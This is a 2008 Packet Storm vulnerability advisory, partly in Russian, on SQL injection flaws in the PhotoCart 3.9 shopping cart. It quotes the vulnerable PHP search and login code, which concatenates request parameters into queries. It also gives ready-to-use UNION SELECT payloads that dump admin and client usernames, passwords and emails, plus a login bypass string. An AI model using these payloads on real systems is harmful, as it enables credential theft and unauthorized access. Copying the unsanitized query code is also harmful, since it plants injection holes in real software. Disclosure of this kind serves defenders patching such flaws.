photocart-sql.txt

2008-08-22T00:00:00
ID PACKETSTORM:69301
Type packetstorm
Reporter ~!Dok_tOR!~
Modified 2008-08-22T00:00:00

Description

                                        
                                            `Author: ~!Dok_tOR!~  
Date found: 18.08.08  
Product: PhotoCart  
Version: 3.9 возможно и более ранние версии  
Type: Photography Shopping Cart  
URL: www.picturespro.com  
Vulnerability Class: SQL Injection  
  
/[installdir]/search.php  
  
Vuln code:  
  
PHP:  
if($_REQUEST['searchby'] == "qtitle") {  
$gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_title LIKE '%".$_REQUEST['qtitle']."%' ";  
print "Results for Gallery or event name: ".$_REQUEST['qtitle']." ";  
}  
if($_REQUEST['searchby'] == "qid") {  
$gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_id='".$_REQUEST['qid']."' ";  
print "Results for Gallery or event ID: ".$_REQUEST['qid']." ";  
}  
if($_REQUEST['searchby'] == "qdate") {  
$gdate = "".$_REQUEST['qyear']."-".$_REQUEST['qmonth']."-".$_REQUEST['qday']."";  
$gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_date='$gdate' ";  
print "Results for Gallery or event date: ".$_REQUEST['qmonth']."-".$_REQUEST['qday']."-".$_REQUEST['qyear']." ";  
}  
  
  
magic_quotes_gpc = Off  
  
Example:  
http://[server]/[installdir]/search.php  
  
Вводим в поле Gallery or event name:  
  
Exploit 1:  
  
' union select 1,2,3,4,5,concat_ws(0x3a,admin_user,admin_pass),7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26 from admin/*  
  
  
  
Exploit 2:  
  
' union select 1,2,3,4,5,concat_ws(0x3a,client_name,client_pass,c lient_email),7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26 from pc_clients/*  
  
  
  
Authentication Bypass SQL Injection  
  
/[installdir]/_login.php  
  
Vuln code:  
  
PHP:  
$result = @mysql_query("SELECT * FROM pc_clients WHERE client_email='".$_REQUEST['email']."' AND client_pass='".$_REQUEST['password']."'");  
  
  
Email Address: 1' or 1=1/*  
Password: 1' or 1=1/*  
`